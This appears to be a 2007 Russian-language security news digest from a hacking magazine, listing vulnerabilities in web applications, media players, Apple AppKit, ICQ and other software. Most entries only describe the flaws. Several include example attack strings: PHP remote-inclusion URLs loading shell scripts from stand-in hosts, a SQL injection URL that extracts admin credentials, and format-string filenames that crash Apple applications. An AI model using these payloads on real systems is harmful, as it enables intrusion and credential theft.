http://www.xakep.ru/post/36607/Imail_Remote_Buffer_Overflow_Exploit2.txt
[ 02 февраля, 2007 ]
Нарушение конфиденциальности информации в zenphoto
Программа: zenphoto 1.x
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной
информации на целевой системе. Уязвимость существует из-за ошибки обработки входных данных в параметре
«album» сценарием index.php. Атакующий может раскрыть содержимое директорий внутри web root.
[ 02 февраля, 2007 ]
Выполнение произвольного кода и отказ в обслуживании в ZABBIX
Программа: ZABBIX 1.x
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему.
Уязвимость существует из-за ошибки в проверке входных данных при обработке SNMP ответов.
Атакующий может передать специально сформированный SNMP пакет, содержащий неправильный IP адрес,
что позволит выполнить произвольный код или осуществить DoS атаку.
[ 02 февраля, 2007 ]
Выполнение произвольных команд в Windows Vista
Программа: Windows Vista
Уязвимость позволяет удаленному злоумышленнику выполнить произвольные команды на целевой системе.
Уязвимость существует из-за ошибки во встроенной технологии распознавания голоса Speech Recognition.
При включении данной функциональности атакующий может обманным образом заставить пользователя зайти на сайт,
содержащий звуковые файлы с записанными командами (например, “open shell”, “copy”, “delete”, ”shutdown”),
что приведет к выполнению произвольных команд на целевой системе.
[ 02 февраля, 2007 ]
PHP-инклюдинг в Portail Web Php
Программа: Portail Web Php 2.5.1
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «site_path» сценарием includes.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
/includes/includes.php?site_path=http://site.com/shell.txt?%00
[ 02 февраля, 2007 ]
PHP-инклюдинг в WebBuilder
Программа: WebBuilder 2.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «GLOBALS[core][module_path]»
сценарием StageLoader.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе
с привилегиями Web сервера.
Пример:
http://victim.com/[path]/library/StageLoader.php?GLOBALS[core][module_path]=Evil.txt?
[ 02 февраля, 2007 ]
PHP-инклюдинг в Epistemon
Программа: Epistemon 1.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «inc_path» сценарием common.inc.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://www.hedef.com/[path]/plateforme/code/inc/common.inc.php?inc_path=Evil.txt
[ 02 февраля, 2007 ]
PHP-инклюдинг в phpEventMan
Программа: phpEventMan 1.0.2
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «level» сценарием text.ctrl.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
www.target.com/script_pat/Shared/controller/text.ctrl.php?level=http://evilscripts ?
www.target.com/script_pat/UserMan/controller/common.function.php?level=http://evilscripts ?
[ 02 февраля, 2007 ]
PHP-инклюдинг в SIPS
Программа: SIPS 0.3.1
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «config[sipssys]»
сценарием box.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе
с привилегиями Web сервера.
Пример:
/sipssys/code/box.inc.php?config[sipssys]=http://[target]/[path]/shell.x
[ 02 февраля, 2007 ]
Переполнение буфера в GOM Player
Программа: GOM Player 2.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных при обработке ASX playlist файлов,
содержащих слишком длинный URI в теге "ref href". Атакующий может передать специально сформированные списки ASX,
что приведет к выполнению произвольного кода.
[ 01 февраля, 2007 ]
PHP-инклюдинг в Cerulean Portal System
Программа: Cerulean Portal System 0.7b
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path»
сценарием portal.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе
с привилегиями Web сервера.
Пример:
www.[target].com/[script_pat]/portal/portal.php?phpbb_root_path=http://evilscripts?
[ 01 февраля, 2007 ]
Переполнение буфера в FreeType
Программа: FreeType 2.2.1
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных при обработке TTF файлов. Атакующий
может передать специально сформированные TTF файлы, что приведет к выполнению произвольного кода.
Пример:
http://www.securityfocus.com/data/vulnerabilities/exploits/18326.zip
[ 01 февраля, 2007 ]
Переполнение буфера в CA BrightStor ARCserve
Программа: CA BrightStor ARCserve
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных в lgserver.exe. Атакующий может передать
специально сформированные данные, что приведет к переполнению стека и выполнению произвольного кода.
Эксплоит: http://www.xakep.ru/post/36579/CA_BrightStor_Arcserve_stack_overflow_exploit.txt
[ 01 февраля, 2007 ]
SQL-инъекция в Hunkaray Duyuru Scripti
Программа: Hunkaray Duyuru Scripti
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием oku.asp.
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL
команды в базе данных приложения.
Пример:
http://[SITE]/oku.asp?id=-1%20union+all+select+0,kullaniciadi,sifre,3+from+admin
[ 01 февраля, 2007 ]
PHP-инклюдинг в Omegaboard
Программа: Omegaboard 1.0beta4
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path»
сценарием functions.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.
Пример:
www.[target].com/[script_pat]/includes/functions.php?phpbb_root_path=http://evilscripts?
[ 01 февраля, 2007 ]
PHP-инклюдинг в JV2 Folder Gallery
Программа: JV2 Folder Gallery 3.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «"galleryfilesdir"»
сценарием gallery/theme/include_mode/template.php. Удаленный пользователь может выполнить произвольный
PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует
включение опции "register_globals" в конфигурационном файле PHP.
Пример:
http://www.Site.com/[JV2 Folder Gallery]/gallery/theme/include_mode/template.php?galleryfilesdir=[Shell]
[ 01 февраля, 2007 ]
Нарушение конфиденциальности информации в Gentoo Linux
Программа: Gentoo Linux
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной
информации на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в Acme Thttpd.
Атакующий может получить содержимое файлов, к которым имеет доступ 'thttpd' процесс.
[ 01 февраля, 2007 ]
Отказ в обслуживании в GTK2
Программа: GTK2
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему.
Уязвимость существует из-за ошибки в проверке входных графических данных в функции GDKPixBufLoader.
Атакующий может передать специально сформированные данные, что приведет к отказу в обслуживании приложения,
использующего библиотеку.
Пример:
http://www.securityfocus.com/data/vulnerabilities/exploits/crash.mbox
[ 01 февраля, 2007 ]
Переполнение буфера в Links и ELinks
Программа:
Links 2.1
ELinks 0.11.1
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных, содержащих SMB команды.
Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного кода.
Эксплоит: http://www.xakep.ru/post/36567/Links_ELinks_buffer_overflow_exploit.txt
[ 01 февраля, 2007 ]
SQL-инъекция в ASPSide.Com
Программа: ASPSide.Com
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «TForum» сценарием User_Confirm.ASP.
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.
[ 01 февраля, 2007 ]
Нарушение конфиденциальности информации в Microsoft Outlook Express
Программа: Microsoft Outlook Express 6.0
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к
конфиденциальной информации в доменах. Уязвимость существует из-за ошибки в проверке входных
данных при обработке «MHTML:» URI. Эксплуатирование уязвимости приведет к междоменному раскрытию информации.
Ранее данная уязвимость была найдена в Internet Explorer, но уязвимый компонент обнаружен и в Outlook Express.
Пример:
http://www.securityfocus.com/data/vulnerabilities/exploits/mhtml.zip
[ 01 февраля, 2007 ]
Отказ в обслуживании в Wireshark
Программа: Wireshark (formerly Ethereal) 0.x
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему.
Уязвимость существует из-за ошибок в TCP, HTTP, IEEE 802.11, и LLT анализаторах при проверке входных данных.
Атакующий может передать специально сформированный пакет или данные сохраненные в файл, что приведет
к отказу системы в обслуживании.
[ 01 февраля, 2007 ]
Переполнение буфера в многочисленных продуктах Apple
Программа: Apple Installer, Software Update, iChat, iPhoto, Help Viewer, Safari и iMovie
Уязвимость позволяет удаленному злоумышленнику осуществить DoS атаку или выполнить произвольный код
на целевой системе. Уязвимость существует из-за ошибки форматирования строк при проверке входных
данных в функциях, входящих в Apple's AppKit framework:
NSBeginAlertSheet
NSBeginCriticalAlertSheet
NSBeginInformationalAlertSheet
NSGetAlertPanel
NSGetCriticalAlertPanel
NSGetInformationalAlertPanel
NSReleaseAlertPanel
NSRunAlertPanel
NSRunCriticalAlertPanel
NSRunInformationalAlertPanel
NSLog
Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного
кода или осуществлению DoS атаки.
Примеры:
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.download
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.imovieproj
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.help
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.download
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.imovieproj
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.help
joe-schmoes-computer:~/Library/Logs/CrashReporter js$ ls
Help Viewer.crash.log Safari.crash.log iMovie HD.crash.log
>> BONUS <<
VERY CRITICAL BUG-OVERVIEW
[ 06 мая, 2003 ]
Шесть уязвимостей в ICQ
В Mirabilis ICQ обнаружено шесть уязвимостей. Уязвимости могут использоваться для DoS нападений
против ICQ пользователей или для выполнения произвольного кода на целевой системе пользователя.
1. Уязвимость форматной строки в POP3 клиенте в поле UIDL.
Уязвимость форматной строки обнаружена в ICQ POP3 клиенте (POP3.dll) в команде UIDL. (RFC 1939).
Злонамеренный POP3 сервер может вставить спецификации формата в сообщение UIDL ответа и выполнить
произвольные команды на POP3 клиенте с привилегиями текущего пользователя.
2. Целочисленное переполнение буфера в POP3 клиенте в поле "Subject"
Удаленный атакующий может послать поле "Subject", размером примерно 33 КБ, чтобы вызвать отрицательное
значение параметра, что приведет к переполнению буфера в POP3 клиенте. В результате работа клиента аварийно
завершится.
3. Целочисленное переполнение буфера в POP3 клиенте в поле "Date"
Удаленный атакующий может послать поле "Date", размером примерно 32 КБ, чтобы вызвать отрицательное
значение параметра, что приведет к переполнению буфера в POP3 клиенте. В результате работа клиента
аварийно завершится.
4. Спуфинг в “Features on Demand” (возможности по требованию).
URL, который используется для загрузки модулей в 'Features on Demand', жестко прописан в подкаталоге
"\DataFiles" в ICQ директории. Нападение возможно из-за недостатка опознавательных методов,
используемых при загрузке новых пакетов. Атакующий может имитировать 'package repository service',
подделывая URL адрес и устанавливая другой источник для загрузки злонамеренного программного обеспечения
на системе ICQ клиента.
5. DoS рекламными баннерами.
URL, используемый для загрузки баннеров имеет следующий формат:
"http://web.icq.com/client/ate/ad-handler/ad_468/0,,[RANDOM],00.htm" Где [RANDOM] – положительное
целое 16 битное случайное число.
Библиотека для обработки URL уязвима к ошибочным атрибутам, указанным в тэге <table>.
Определяя значение атрибута “width" равным ‘-1’, библиотека будет использовать 100% CPU,
что приведет к нарушению работы ICQ и всей системы. Нападение возможно из-за недостатка опознавательных
методов, используемых в запросах. Атакующий может имитировать "ADS server" , подделывая URL адрес и
устанавливая другой источник для загрузки злонамеренных баннеров.
6. Уязвимость в проверке правильности ввода в ICQ GIF parsing/rendering библиотеке.
При анализе GIF89a заголовка файла, ICQ GIF parsing/rendering библиотека ожидает одно из значений GCT
(Global Color Table) или LCT (Local Color Table) после "Image Descriptor". Когда ни одна из этих таблиц
цветов не существует, библиотека будет работать со сбоями.
Уязвимость обнаружена в Mirabilis ICQ Pro 2003a client.
[ 22 декабря, 2006 ]
Множественные уязвимости в @Mail
Программа:
@Mail 3.x
@Mail 4.x
Найденные уязвимости позволяют удаленному злоумышленнику выполнить XSS нападение и скомпрометировать целевую систему.
1) Уязвимость возникает из-за ошибки в обработке входных данных перед возвращением их пользователю.
Атакующий может выполнить произвольный HTML или JavaScript сценарий в браузере пользователя в контексте
безопасности уязвимого сайта.
2) Уязвимость возникает из-за ошибки, позволяющей пользователям выполнить определенные действия через
HTTP запросы без выполнения проверки пользовательских запросов.
<< _end;